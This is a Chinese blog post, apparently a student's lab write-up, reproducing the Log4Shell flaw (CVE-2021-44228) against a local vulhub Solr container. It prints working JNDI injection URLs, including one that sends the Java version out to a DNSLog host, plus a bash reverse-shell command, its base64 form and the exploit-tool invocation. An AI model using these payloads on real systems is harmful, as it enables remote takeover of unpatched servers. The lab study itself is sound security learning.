Apache Log4j2远程代码执行漏洞复现(CVE-2021-44228)-----记第一次反弹shell

最新推荐文章于 2024-06-12 09:45:51 发布
最新推荐文章于 2024-06-12 09:45:51 发布
阅读量243 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: apache log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73767109/article/details/131491311
版权

目录

靶场搭建

漏洞测试

漏洞利用

总结

 

靶场搭建

 因为没有服务器所以只能在本地搭建,在虚拟机上拉取文件

git clone https://github.com/vulhub/vulhub.git

 Vulhub - Docker-Compose file for vulnerability environment

 下载好后到CVE-2021-44228目录下启动漏洞的容器

sudo docker-compose up -d

 

 访问成功

 

漏洞测试

首先了解一下JNDI

 JNDI,全称为Java命名和目录接口(Java Naming and Directory Interface),是SUN公司提供的一种标准的Java命名系统接口,允许从指定的远程服务器获取并加载对象。JNDI相当于一个用于映射的字典,使得Java应用程序可以和这些命名服务和目录服务之间进行交互。JNDI注入攻击时常用的就是通过RMI和LDAP两种服务,本文以LDAP服务为例进行复现。

这里我们使用DNSLog平台测试dns回显

DNSLog Platform

 首先在里面获取一个地址

在该网页的/solr/admin/cores目录下有参数可以传

所以传入一个参数

http://192.168.200.128:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.l1wa8j.dnslog.cn}

 红色部分是获取到的地址

 再来看DNSLog

发现有数据传输,说明存在Log4j2漏洞

漏洞利用

 攻击机:kali 192.168.200.128

先编写一个反弹shell的语句

bash -i >& /dev/tcp/192.168.200.128/6666 0>&1

 6666是攻击机要监听的端口

对该语句进行base64编码

 Runtime.exec Payload Generater | AresX's Blog (ares-x.com)

接下来下载工具JNDI-Injection-Exploit

这个工具可以一键部署LDAP服务和http服务

sudo git clone https://github.com/sayers522/JNDI-Injection-Exploit.git

 下载好之后在该JNDI-Injection-Exploit文件目录下打开终端,生成.jar可执行文件

mvn clean package -DskipTests

 

 

生成后会在JNDI-Injection-Exploit目录下发现一个target文件,在该文件下打开终端

进行一键部署

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "构造反弹shell的命令的base64编码" -A "攻击机ip"

结合上面的编码最终为

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMC4xMjgvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.200.128"

 接下来监听要反弹shell的端口6666

 最后进行JNDI注入,向靶场网页传入payload

http://192.168.200.128:8983/solr/admin/cores?action=${jndi:ldap://192.168.200.128:1389/jnamke}

 

 可以发现有回显和成功反弹shell

 

总结

 通过工具来生成带有反弹shell语句的恶意可执行文件,进而通过部署LDAP服务和http服务,然后通过LDAP服务实现JNDI注入使得服务器去请求http服务上的恶意可执行文件从而造成服务器解析反弹shell的指令最后实现getshell

 

 参考:
(1条消息) log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)_Bossfrank的博客-CSDN博客

log4j2漏洞经典复现(vulhub靶场) - FreeBuf网络安全行业门户 

Sharpery
关注
专栏目录
Log4j2 漏洞检测工具清单
01-17 1万+
距离Log4j2漏洞公开已经过去一个月了,它所造成的严重影响已经不需要我们重复提及了。随着时间的推移,新的漏洞会不断出现,旧的漏洞会不断消失,而这个Log4j2中的RCE漏洞可能需要好几年...
[ vulhub漏洞复现篇 ] Apche log4j远程代码执行漏洞(CVE-2021-44228)
qq_51577576的博客
08-20 1534
apache log4j通过定义每一条日志信息的级别能够更加细致地控制日志生成地过程,受影响地版本中纯在JNDI注入漏洞,导致日志在录用户输入地数据时,触发了注入漏洞,该漏洞可导致远程代码执行,且利用条件低,影响范围广,小到网站,大到可联网的车都受影响,建议使用了相关版本的应用或者插件,尽快升级修补,做好相关方措施,避免造成不必要的损失 [ vulhub漏洞复现篇 ] Apche log4j远程代码执行漏洞(CVE-2021-44228)
探索Log4j漏洞检测工具:log4j_vuln
gitblog_00096的博客
04-01 496
探索Log4j漏洞检测工具:log4j_vuln 项目地址:https://gitcode.com/fengxuangit/log4j_vuln 项目简介 log4j_vuln 是一个开源项目,专门为开发者和安全团队设计,用于检测Java环境中的Apache Log4j2安全漏洞Log4j是广泛使用的日志录库,但最近被曝出严重的远程代码执行(RCE)漏洞,影响全球诸多系统。该项目旨在提供一种简...
使用亚马逊云科技安全服务防御、检测和响应 Log4j 漏洞
亚马逊云科技专栏
12-20 504
概述在本文中,我们将为针对最近披露的 Log4j 漏洞所影响的客户提供一些指导意见。内容包括如何限制漏洞的风险,如何尝试识别是否易受此问题影响,以及如何使用适当的补丁更新基础架构。Log4...
log4j2漏洞检测工具
05-07
1、检测项目中是否存在log4j漏洞 2、工作使用
Log4j 漏洞修复检测 附检测工具
热门推荐
cnsre运维博客
12-13 1万+
作者:SRE运维博客 博客地址:https://www.cnsre.cn/ 文章地址:https://www.cnsre.cn/posts/211213210004/ 相关话题:https://www.cnsre.cn/tags/Log4j/ 近日的Log4j2,可是非常的火啊,我也是加班加点把补丁给打上了次安心。Apache Log4j2存在远程代码执行漏洞,经验证,该漏洞允许攻击者在目标服务器上执行任意代码,可导致服务器被黑客控制。由于Apache Log4j 2应用较为广泛,建议使用该组件的用..
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
然而,2021 年底,Log4j 发现了一个严重的安全漏洞,被称为 CVE-2021-44228(也称为 Log4Shell),这使得攻击者可以通过在日志录中注入恶意代码远程执行任意代码,从而对受影响的系统造成严重威胁。 此漏洞源于...
Log4j2远程代码执行漏洞复现(cve-2021-44228)
weixin_47179815的博客
07-12 1万+
Log4j2远程代码执行漏洞(cve-2021-44228)复现内容Apache log4jApache的一个开源项目,Apache log4j 2是一个就Java的日志录工具。通过重写了log4j框架,并且引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于录程序输入输出日志信息。log4j2中存在JNDI注入漏洞,当程序录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。JNDI简单介绍JNDI(Java Na
Apache Log4j2 远程代码执行漏洞检测工具
12-15
然而,在2021年12月初,一个严重的安全漏洞CVE-2021-44228)被公开,这个漏洞被称为"Log4Shell",允许攻击者通过注入恶意的JNDI(Java Naming and Directory Interface)链接来执行远程代码,对受影响的系统造成...
Apache Log4j2远程代码执行漏洞(CVE-2021-45105/CVE-2021-44228)、
最新发布
08-22
CVE-2021-45105和CVE-2021-44228是针对该框架的一个严重安全漏洞,也被称为Log4ShellLog4J RCE(Remote Code Execution)。这个漏洞源于Log4j库的一个设计缺陷,当处理某些特定类型的外部输入数据时,攻击者可以...
已修改过的log4j-1.2.17.jar
11-21
使用log4j的DailyRollingFileAppender时只有一个日志文件,修改DailyRollingFileAppender源码
静态代码检测工具Wukong对log4J中的漏洞检测、分析及漏洞修复
m0_61869253的博客
05-07 903
最近的Log4J漏洞(CVE-2021-44228)正造成网络大乱,其影响力不亚于早期的HeartBleeding漏洞。2.0-beta9 ~ 2.14.1版本的Apache Log4j2均存在改漏洞,可以说直接影响了大部分基于Java的应用。该漏洞最早被阿里云安全团队发现并验证,随即被Apache定义为高危级别。Log4j在log字符串”jndi:xxx”时,“{jndi:xxx}”时,“jndi:xxx”时,“{“这一特殊字符会指定Log4J通过JNDI来根据字符串”xxx”获得对应名称。
使用Yak搭建Log4j漏洞检测工具
YakProject的博客
11-07 333
当然,以上是用最简单的方式进行了Log4j复现和检测,如果需要检测线上环境是否有漏洞,可以把OpenLDAP环境地址映射到外网。如果真的做成生产力工具,还需要考虑更多的情况,比如线程、参数等等,文章中的Yak代码也有优化的空间,最后可以ssh到日志环境,根据日志信息用字符串判断是否触发漏洞,达到Log4j漏洞判断的自动化。本文只是简单的应用,入门而已,Yak还有很多精彩的特性,作者也还在学习中。总之Yak是整合了当前多种安全工具和开源项目,让安全从业人员无需安装复杂的依赖,就能上手工作。
Apache Log4j 远程代码执行漏洞批量检测工具
保持微笑的博客
01-10 3129
漏洞描述 由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。 影响版本 Apache Log4j 2.x < 2.15.0-rc2 影响范围 含有该漏洞Log4j影响到超过 6000个中间件或应用,目前已知的可能受影响的应用及组件包括但不限于如下清单中所列出的: Sp...
推荐开源项目:本地log4j漏洞扫描器
gitblog_00060的博客
05-23 403
推荐开源项目:本地log4j漏洞扫描器 local-log4j-vuln-scannerSimple local scanner for vulnerable log4j instances项目地址:https://gitcode.com/gh_mirrors/lo/local-log4j-vuln-scanner 项目介绍 在软件安全领域,及时发现并修复漏洞至关重要。为此,我们向您推荐一款名为...
推荐使用:Qualys Log4jScanner - 强大的Java安全扫描工具
gitblog_00090的博客
06-12 386
推荐使用:Qualys Log4jScanner - 强大的Java安全扫描工具 项目地址:https://gitcode.com/Qualys/log4jscanwin 在网络安全日益重要的今天,识别和修复潜在漏洞变得至关重要。为此,我们向您推荐一个高效且易于使用的开源项目——Qualys Log4jScanner,这是一个专为检测著名CVE漏洞(如CVE-2021-44228)而设计的Java...
推荐开源项目:Log4j 扫描工具 - FullHunt Log4j-Scan
gitblog_00053的博客
04-25 499
推荐开源项目:Log4j 扫描工具 - FullHunt Log4j-Scan log4j-scanA fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228 项目地址:https://gitcode.com/gh_mirrors/lo/log4j-scan 是一个强大的自动化扫描...
探索Apache Log4j RCE POC:一款强大的安全检测工具
gitblog_00066的博客
04-21 478
探索Apache Log4j RCE POC:一款强大的安全检测工具 项目地址:https://gitcode.com/xiajun325/apache-log4j-rce-poc 在网络安全领域,漏洞检测和预防是至关重要的。这个项目——apache-log4j-rce-poc,是一个针对著名Apache Log4j 2.x框架的远程代码执行(RCE)漏洞的验证工具。它的目标是帮助开发者、系统管...
Log4j漏洞不仅仅是修复,更需要构建有效预警机制
阿里云云栖号
12-15 5237
简介:软件的漏洞有时不可避免,根据Gartner的相关统计,到 2025 年,30% 的关键信息基础设施组织将遇到安全漏洞。日志服务SLS,可帮助快速部署一个预警机制,使得漏洞被利用时可以快速发现并及时响应。通过使用阿里云日志服务SLS,只需两步即可完成攻击检测。 近日,被全球广泛应用的Java日志框架组件Apache Log4j被曝出一个高危漏洞,攻击者仅需一段代码就可远程控制受害者服务器,漏洞波及面和危害程度堪比2017年的“永恒之蓝”漏洞。 据外媒报道,Steam、苹果的云服务受到了影响,推特和亚
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sharpery

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值